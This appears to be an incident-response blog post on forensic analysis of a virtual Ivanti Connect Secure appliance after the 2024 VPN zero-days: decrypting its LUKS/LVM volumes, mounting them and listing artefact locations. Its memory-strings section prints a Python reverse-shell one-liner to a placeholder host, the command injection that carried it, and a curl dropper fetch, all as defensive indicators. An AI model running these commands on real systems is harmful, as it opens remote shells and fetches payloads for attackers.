Ivanti Connect Secure Auth Bypass and Remote Code Authentication CVE-2024-21887

This article provides guidance on how to inspect/analyse disk images/memory from a virtual Ivanti Connect Secure appliance, in response to CVE-2023-46085 and CVE-2024-21887.

On 10th January 2024, Volexity posted an article[1] advising they had identified active in-the-wild exploitation of two zero day vulnerabilities affecting Ivanti's Connect Secure (ICS) application.

On 12th January 2024, Mandiant also contributed to the public discussion and posted[2] their article.

Based on the above articles, we deployed a vulnerable Ivanti Connect Secure appliance (v22.3R1, build 1647) to test publicly available proof of concepts to understand where artefacts may reside in order to support forensic analysis.

This article does not reference indicators of compromise. Please check blog posts by Volexity, Mandiant, and Rapid7. Please also follow mitigation advice by Ivanti[7] and watchTowr[8]

This article assumes you have a virtual appliance, you have followed your incident response process, and have preserved system snapshots (including memory dumps), and disk images.

(If you're performing this on Hyper-V or ESXi, just create a snapshot and export resultant virtual disks and vmem and copy them to your analysis environment).

Inspecting Disk Image

A single VMDK was subject to analysis. Unaware of the filesystem, we simply initially inspected the disk using FTK Imager on a Windows host. This indicated (as you can see in the photo) there are a series of partitions of various sizes, with varying filesystems. I immediately felt there were similarities between the ICS application and the Citrix ADC application, that being it is likely based on BSD/FreeBSD, but this required further digging.

Expanding the 'unpartitioned space [LVM2]' node indicated physical volume (pv) groups. Each folder contains relevant metadata and LVM configuration data, such as volume group ID, format, underlying partitions (which physical volume/partition they relate to).

Upon inspecting groupA-runtme, groupZ-home, etc, we could see indications that LUKS was being used. This throws a spanner in the works as we don't know any of the protectors. (If you need a refresher or some test disk images for LVM and LUKS, head over here >ext4, LVM, and LUKS1/LUKS2

So we have a virtual disk, it contains multiple partitions, they're of an unknown filesystem, we need a key to decrypt the LUKS volume and then we can reassemble it.

A recent Blackhat[3] resource authored by Orange Tsai and Meh Chang came in rather handy. If Orange's name is familiar, have a look at the history behind ProxyShell. Anyway, that article suggests that if you append init=//bin/sh to the grub bootloader, you can spawn a shell during boot. Added that, F10 to boot with new options, and we have a new shell.

We know lvm/mdadm config is usually in /etc so this is the first place we look. We see /etc/lvmkey, so let's see what it contains. Executing $ cat lvmkey distorts the screen, throws characters everywhere, and makes the terminal unusable. There are limited command line tools so there's no real way to copy the key, other than using cat.

This Stackoverflow article[4] provides a decoding table for the above values. This converts to b99ecf89754ec76018ca0eda5d6ac7. Next step is to convert that to a key file so we can use it to decrypt our LUKS volume. If this were a simple password, you could attempt to mount the volume and enter the password[5]

Create a hex output of the key so we can use it as a keyfile;

$ echo -n b99ecf89754ec76018ca0eda5d6ac7 | xxd -r -p - > lvmkey

... which turns out to be incorrect, and the resultant lvmkey is incorrect.

It was about this time that we were provided with Rapid7's technical analysis[6] which ultimately saved a lot of time, as we would've been going down a rabbit hole. The arguments originally used with cat (-v) wasn't sufficient, as there is a special character ($) at the beginning of the key. This is why there is a new line between the command and M-9. The correct key is 0ab99ecf89754ec76018ca0eda5d6ac7.

$ echo -n 0ab99ecf89754ec76018ca0eda5d6ac7 | xxd -r -p - > lvmkey

Now we need to either mount the VMDK inside the our VM, or attach it externally as a new disk.

$ lsblk
NAME    MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS
sdc       8:32   0   40G  0 disk
├─sdc1    8:33   0 70.6M  0 part
├─sdc2    8:34   0 70.6M  0 part
├─sdc3    8:35   0 70.6M  0 part
├─sdc4    8:36   0    1K  0 part
├─sdc5    8:37   0    3G  0 part
├─sdc6    8:38   0    4G  0 part
├─sdc7    8:39   0  8.3G  0 part
├─sdc8    8:40   0    4G  0 part
├─sdc9    8:41   0  8.3G  0 part
├─sdc10   8:42   0  3.9G  0 part
└─sdc11   8:43   0  8.3G  0 part

Identify volume groups (vgs) and logical volumes (lvs) so we can attempt to mount them.

$ vgs
  VG     #PV #LV #SN Attr   VSize  VFree
  groupA   2   2   0 wz--n- 12.30g    0
  groupS   1   1   0 wz--n-  3.90g    0
  groupZ   1   1   0 wz--n-  3.00g    0
  
$ lvs
  LV      VG     Attr       LSize Pool Origin Data%  Meta%  Move Log Cpy%Sync Convert
  home    groupA -wi-a----- 3.50g
  runtime groupA -wi-a----- 8.80g
  swap    groupS -wi-a----- 3.90g
  home    groupZ -wi-a----- 3.00g

We need to activate each of the volume groups (groupA, S, Z) so we can map them (-a activates them, y is yes/confirm)

$ vgchange -ay groupA
  2 logical volume(s) in volume group "groupA" now active
$ vgchange -ay groupS
  1 logical volume(s) in volume group "groupS" now active
$ vgchange -ay groupZ
  1 logical volume(s) in volume group "groupZ" now active

Now we can see that partitions within our block device (/dev/sdc) are identified as LVM parts

$ lsblk
NAME               MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS
sdc                  8:32   0   40G  0 disk
├─sdc1               8:33   0 70.6M  0 part
├─sdc2               8:34   0 70.6M  0 part
├─sdc3               8:35   0 70.6M  0 part
├─sdc4               8:36   0    1K  0 part
├─sdc5               8:37   0    3G  0 part
│ └─groupZ-home    253:3    0    3G  0 lvm
├─sdc6               8:38   0    4G  0 part
│ ├─groupA-home    253:0    0  3.5G  0 lvm
│ └─groupA-runtime 253:1    0  8.8G  0 lvm
├─sdc7               8:39   0  8.3G  0 part
│ └─groupA-runtime 253:1    0  8.8G  0 lvm
├─sdc8               8:40   0    4G  0 part
├─sdc9               8:41   0  8.3G  0 part
├─sdc10              8:42   0  3.9G  0 part
│ └─groupS-swap    253:2    0  3.9G  0 lvm
└─sdc11              8:43   0  8.3G  0 part

We can also see our logical volumes are visible under /dev/mapper

$ ls -l /dev/mapper
groupA-home -> ../dm-0
groupA-runtime -> ../dm-1
groupS-swap -> ../dm-2
groupZ-home -> ../dm-3

Confirming we can't mount each LVM part as it's protected by LUKS;

$ mount /dev/groupA/home /mnt/tmp
mount: /mnt/tmp: unknown filesystem type 'crypto_LUKS'.

Mount each /dev/mapper/group* entry with a corresponding point name.

$ ls /dev/group*
/dev/groupA:
home  runtime

/dev/groupS:
swap

/dev/groupZ:
home

$ cryptsetup luksOpen -d lvmkey /dev/groupA/home ivanti1
$ cryptsetup luksOpen -d lvmkey /dev/groupA/runtime ivanti2
$ cryptsetup luksOpen -d lvmkey /dev/groupS/swap ivanti3
$ cryptsetup luksOpen -d lvmkey /dev/groupZ/home ivanti4

You can see how we've gone from raw block devices, to VG/LV, and now mounted points.

$ lsblk
NAME               MAJ:MIN RM  SIZE RO TYPE  MOUNTPOINTS
sdc                  8:32   0   40G  0 disk
├─sdc1               8:33   0 70.6M  0 part
├─sdc2               8:34   0 70.6M  0 part
├─sdc3               8:35   0 70.6M  0 part
├─sdc4               8:36   0    1K  0 part
├─sdc5               8:37   0    3G  0 part
│ └─groupZ-home    253:3    0    3G  0 lvm
│   └─ivanti4      253:7    0    3G  0 crypt
├─sdc6               8:38   0    4G  0 part
│ ├─groupA-home    253:0    0  3.5G  0 lvm
│ │ └─ivanti1      253:4    0  3.5G  0 crypt
│ └─groupA-runtime 253:1    0  8.8G  0 lvm
│   └─ivanti2      253:5    0  8.8G  0 crypt
├─sdc7               8:39   0  8.3G  0 part
│ └─groupA-runtime 253:1    0  8.8G  0 lvm
│   └─ivanti2      253:5    0  8.8G  0 crypt
├─sdc8               8:40   0    4G  0 part
├─sdc9               8:41   0  8.3G  0 part
├─sdc10              8:42   0  3.9G  0 part
│ └─groupS-swap    253:2    0  3.9G  0 lvm
│   └─ivanti3      253:6    0  3.9G  0 crypt
└─sdc11              8:43   0  8.3G  0 part

We also have corresponding mapper entries under /dev/mapper for ivanti[1..4]

$ ls /dev/mapper
ivanti1  ivanti2  ivanti3  ivanti4

Now we need to create a mount location, and then mount each LVM

$ mkdir /mnt/ivanti{1..4}
$ mount /dev/mapper/ivanti1 /mnt/ivanti1
$ mount /dev/mapper/ivanti2 /mnt/ivanti2
$ mount /dev/mapper/ivanti3 /mnt/ivanti3
$ mount /dev/mapper/ivanti4 /mnt/ivanti4

$ ls /mnt/ivanti1
boot  lost+found  root

$ ls /mnt/ivanti2
ace  cores  extra-sw  gs_files  local  lost+found  pkg  runtime  snmpconf  snmpd.spec.cfg  sysconf  tmp  upgradelogs  var  versions

$ ls /mnt/ivanti3
analytics.log                                dscsd.statementcounters             dsserver.statementcounters           iptable_checkResult                           sbrhealth
attackaudit-server.statementcounters         dsdashserver.statementcounters      dsserver-tasks.pl.statementcounters  iptable_result                                sbrnotify.exclusion
browse-server.statementcounters              dsdashsummary.statementcounters     dsstartfb.statementcounters          ive.ovfEnv                                    sbrnotify.statementcounters
cache_server.statementcounters               dsdbglogd.statementcounters         dsstartguacd.statementcounters       iveradius.exclusion                           scanner
cgi-errors                                   dsevntd.statementcounters           dsstartkwatchdog.statementcounters   libevntd.statementcounters                    sessionserver.statementcounters
cgi-server.statementcounters                 dsidpmonitor.statementcounters      dsstartnis.statementcounters         licenseMightHaveChanged.pl.statementcounters  smbconf.statementcounters
checkWinbinddProcesses.pl.statementcounters  dsinvoked.statementcounters         dsstartws.statementcounters          lmdbccerr                                     smbmon.statementcounters
cmdmmap.sMxNw2                               dsjavad.statementcounters           dsstatdump.statementcounters         namecoordinatord.statementcounters            startVmwareGuestd.pl.statementcounters
CpuStatus                                    dsksyslog.statementcounters         dssyslogfwd.statementcounters        nameserverd.statementcounters                 stats
dhcpProxy.statementcounters                  dslicenseclientd.statementcounters  dssyslogfwd_zmq_sock                 notification                                  svb
dhcpreq-ext0.log                             dsliveupdate.statementcounters      dssysmonitord.statementcounters      numlineevlog                                  tmp
dhcpreq-int0.log                             dslmdbcheck.statementcounters       dstaillog.statementcounters          out.log                                       Tncshealth
dmi-server.statementcounters                 dslogserver.statementcounters       dsterminald.statementcounters        parevntd.statementcounters                    tncs.statementcounters
dns_cache.statementcounters                  dsmdm.statementcounters             dsvlsHeartBeat.statementcounters     perl.statementcounters                        updateLinkLocalAddress.pl.statementcounters
dsacpiwatch.statementcounters                dsnetd.statementcounters            dswatchdogng.statementcounters       pssaml.statementcounters                      vmware-root
dsagentd.statementcounters                   dsnicsorter.statementcounters       EGG-INFO                             pushconfig.util                               watchdog.statementcounters
dsclusinfod.statementcounters                dsnodemon.statementcounters         eventd.statementcounters             pyeventhandler.statementcounters              web80.statementcounters
dscockpitd.statementcounters                 dspasschanged.statementcounters     fqdnacl.statementcounters            pythoneventhandler                            web.statementcounters
dsconfig.pl.statementcounters                dspushserver.statementcounters      have_many_opened_files               radius.statementcounters                      zeromq
dscpumond.statementcounters                  dsradiusacct.statementcounters      hsperfdata_root                      res_utilization
dscrld.statementcounters                     dssensord.statementcounters         html5acc-server.statementcounters    saml-metadata-server.statementcounters

$ ls /mnt/ivanti4
bin  boot  dbg  dev  etc  grub-2  lib  lost+found  mnt2  modules  pkg  proc  sbin  sys  tmp  usr  va

We used Rapid7's public POC to simulate an attack on a new Ivanti appliance to generate artefacts, spawn a reverse shell, transfer files to a remote host, explore the file system, etc.

At the time of this article, we were only able to find memory resident artefacts relating to the shell itself and possible commands.

Possible Artefact Locations

LocationContents

ivanti2/runtime/logs/log.admin.vc0

Console logins from foreign/remote IP addresses, user-agent data, username information, ICS appliance SSL information

ivanti2/runtime/logs/log.events.vc0

As above

ivanti2/runtime/system.j

Remote IP address entries relating to incoming connections

Relevant Memory Strings (if you don't have a volatility profile)

python -c import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",4444));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())
/home/perl5/bin/perl /home/perl/AwsAzureTestConnection.pl ;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",4444));subprocess.call(["/bin/sh",
/bin/sh

Remember if you're using grep/strings, use -A (after) and -B (before) to show X number of lines before/after a match. (PID 4753, 4756 below)

--
 2958  2722  0.3  0.6 98836 186616 55684 S radius -debug -d.
 2997     1  0.0  0.0   696   9184   400 S smbserver
 2998  2997  0.0  0.0  1496  10008  4416 S smbserver
 4132  2186  0.0  0.5  6820  76732 43596 S /home/ecbuilds/int-rel/sa/22.3/bld1647.1/install/bin/saml-server ssoservice --dspar 27 98
 4133  4132  0.0  0.2  6820  76732 22988 S /home/ecbuilds/int-rel/sa/22.3/bld1647.1/install/bin/saml-server ssoservice --dspar 27 98
 4753  2852  0.0  0.0   452   4852  3744 S /bin/sh -c /home/perl5/bin/perl /home/perl/AwsAzureTestConnection.pl ;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",4444));subprocess.call(["/bin/sh",
 4756  4753  0.0  0.1  2296   9532  8208 S python -c import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",4444));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())
 4757  4756  0.0  0.0   460   4860  3848 S /bin/sh -i
 4762     2  0.0  0.0     0      0     0 I [kworker/u8:2]
 6510  2320  0.0  0.2  5308  60356 23548 S /home/ecbuilds/int-rel/sa/22.3/bld1647.1/install/bin/parevntd
 6543     2  0.0  0.0     0      0     0 I [kworker/u8:0]
--

/perl5/bin/somereallybadcommand
/perl5/bin/curl -ik https://remoteurl.xyz/dropper

References:

[1] Volexity; https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/

[2] Mandiant; https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day

[3] Blackhat; https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf

[4] https://stackoverflow.com/questions/44694331/what-is-the-m-notation-and-where-is-it-documented/44952259#44952259

[5] https://www.howtoforge.com/automatically-unlock-luks-encrypted-drives-with-a-keyfile

[6] https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis

[7] Ivanti; https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US

[8] watchTowr; https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/

NIST; CVE-2023-46085; https://nvd.nist.gov/vuln/detail/CVE-2023-46805

NIST; CVE-2024-21887; https://nvd.nist.gov/vuln/detail/CVE-2024-21887

Last updated